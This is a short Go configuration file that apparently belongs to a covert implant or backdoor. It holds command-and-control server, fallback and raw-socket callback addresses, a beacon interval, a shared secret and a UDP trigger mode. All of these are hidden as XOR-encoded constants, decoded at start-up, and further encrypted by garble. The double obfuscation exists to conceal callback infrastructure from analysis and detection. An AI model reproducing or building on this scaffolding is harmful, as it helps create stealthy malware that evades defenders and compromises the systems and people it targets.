package config

// Build-time values are injected via config_gen.go (generated by make genconfig).
// The encoded constants (_sv, _fb, ...) are XOR(0x5A) strings decrypted by init().
// garble -literals then encrypts the encoded constants in config_gen.go — two layers.

var (
	DefaultServer   = ""
	FallbackServer  = ""
	RawsockCBAddr   = ""
	KCCAddr         = ""
	DefaultInterval = "30s"
	SharedSecret    = ""
	TriggerMode     = "udp"
	BuildMeta       = "" // SEC mechanism — ldflag only, intentionally absent in unauthorized builds
)

func init() {
	if v := xd(_sv); v != "" {
		DefaultServer = v
	}
	if v := xd(_fb); v != "" {
		FallbackServer = v
	}
	if v := xd(_rb); v != "" {
		RawsockCBAddr = v
	}
	if v := xd(_kc); v != "" {
		KCCAddr = v
	}
	if v := xd(_iv); v != "" {
		DefaultInterval = v
	}
	if v := xd(_sk); v != "" {
		SharedSecret = v
	}
	if v := xd(_tr); v != "" {
		TriggerMode = v
	}
}

// xd decodes a XOR(0x5A)-encoded string constant from config_gen.go.
func xd(s string) string {
	if s == "" {
		return ""
	}
	b := make([]byte, len(s))
	for i := range s {
		b[i] = s[i] ^ 0x5A
	}
	return string(b)
}
